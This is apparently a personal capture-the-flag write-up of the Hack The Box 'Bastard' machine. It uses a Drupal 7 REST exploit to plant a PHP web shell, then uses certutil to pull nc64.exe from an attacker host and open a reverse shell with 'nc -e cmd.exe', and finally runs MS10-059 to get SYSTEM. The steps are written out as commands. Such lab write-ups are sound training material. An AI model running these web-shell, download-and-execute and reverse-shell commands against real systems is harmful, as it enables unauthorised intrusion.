Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  • Port 80 HTTP
  • Establishing a Reverse Shell
  • Privilege escalation as iusr
  1. Walk-throughs
  2. WPE Capstones

Bastard HTB

PreviousBastion HTBNextArctic HTB

Last updated 1 year ago

IP

10.10.10.9

Nmap

sudo nmap -sV -sC -A -oA nmap/results 10.10.10.9

We can see the following ports are open on the machine

80:HTTP

135:RPC

49154:RPC

Let's navigate to port 80 and see what we can find

Port 80 HTTP

When we first land on the web server we are greeted with

Using wappalyzer we can see its using the following technologies

  • drupal 7

  • PHP

  • Windows system

Lets do some directory busting and see if we can find any hidden pages

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.9 -o dirs.txt

  • Drupal 7.54

With this information we can use searchsploit and see if its vulnerable to any exploits

searchsploit drupal 7

The section highlighted above is a great place to start, if we can get RCE on the target machine we can establish a reverse shell. Let's pull it down to our working directory.

searchsploit -m php/webapps/41564.php

When we bring any exploit down, checking the code is always important, we want to ensure we know what we are performing. When reviewing the code, we have noticed we have to make some slight changes.

We need to add the URL path of the target machine and the endpoint path, which we can do by navigating to the webpage and searching.

http://10.10.10.9/rest

Once we have added the URL and endpoint path we use PHP to pass through system commands such as 

<php? echo shell_exec("whoami");?>

  • which will run "whoami" within the target machine

First you may need to install php-curl which can be done by

sudo apt-get install php-curl

Now that we have modified our script and installed php-curl let's run our exploit

php 41564.php

Our exploit also generated two files "session.json" and "user.json" when searching through the files we find a Drupal 7 hash within the user.json file.

$S$DRYKUR0xDeqClnV5W0dnncafeE.Wi4YytNcBmmCtwOjrcH5FJSaE

we could use Hashcat to crack it but this is a CTF and it was taking too long but here is the command to crack it

hashcat -m 7900 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Let's navigate to "http://10.10.10.9/shell.php"

We have successfully passed the command "whoami" onto the target machine. Now that we know the exploit works we can start to work on establishing a reverse shell.

Establishing a Reverse Shell

We need to make some minor modifications to our exploit script. Instead of 

<php? echo shell_exec("whoami");?>

We want a way of passing commands through the URL browser bar.

<php? system($_REQUEST["cmd"]);?>

now what is this PHP one-liner doing

  • '<?php': This indicates the start of a PHP code block

  • 'system()': is a built-in PHP function used to execute shell commands. It takes a command as its argument and passes it through to the operating system's command-line interface. When the command is executed, any output is printed to the web page

  • '$REQUEST': is a superglobal array in PHP that combines the contents of $_GET, $_POST, and $_COOKIE. It holds data submitted via both GET and POST methods.

  • '["cmd"]': This is an array key accessed within the $_REQUEST array. it means that the PHP code expects a parameter named "cmd" to be passed either via the URL(GET) or in the body of an HTTP POST request

Let's test our exploit

php 41564.php

Navigating to the web page we can now pass commands through to the system

Awesome! Now let's prepare for a reverse shell

  • First, lets clone nc64.exe onto our system

git clone https://github.com/int0x33/nc.exe.git

  • cp nc64.exe into our working directory

cp path/to/nc64.exe ./

  • Second, Let's start up a Python server to grab nc64.exe

python3 -m http.server 8080

  • Third, let's upload nc64.exe onto the target machine, well use curl to interact with our web shell

curl "http://10.10.10.9/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20"http://10.10.16.4:8080/nc64.exe"%20nc64.exe

  • Fourth, lets set up a net cat listener

nc -lvnp 9002

  • Fifth, Let's execute nc64 on our target machine

curl "http://10.10.10.9/shell.php?cmd=cmd.exe%20/c%20nc64.exe%2010.10.16.4%209002%20-e%20cmd.exe"

We now have a shell of the target system

Privilege escalation as iusr

First thing let's grab some system information and see if it is vulnerable to any exploits.

systeminfo

Now lets copy and paste this onto our local machine and run it through wes-ng, if you dont have wes-ng you can clone it from the following repo

git clone https://github.com/bitsadmin/wesng.git

Dont forget to update wes-ng in the directory you are working in

/opt/wesng/wes.py --update

Now that we have systeminfo.txt (the system information from our target machine) we can run it through wes-ng which will see if it is vulnerable to any exploits.

/opt/wesng/wes.py systeminfo.txt

We are given a long list of CVE's the target machine may be vulnerable to but one sticks out, MS10-059.

MS10-059 will allow us to establish another reverse shell with elevated privileges.

we can find MS10-059 in the following repo.

https://github.com/ASR511-OO7/windows-kernel-exploits/tree/master/MS10-059

Let's set up a Python server and download the exploit, just for fun and practice let's use our web shell and curl to download the exploit onto the system.

python3 -m http.server 8080
curl 'http://10.10.10.9/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20"http://10.10.16.4:8080/MS10-059.exe"%20MS10-059.exe'

Now that we have the MS10-059 on our target machine we can setup a netcat listener.

nc -lvnp 9005

from our target machine let's run the exploit.

.\MS10-059.exe 10.10.16.4 9005

We now have a shell as nt authority\system on the target machine.

We find the which gives the accurate version of drupal

http://10.10.10.9/CHANGELOG.txt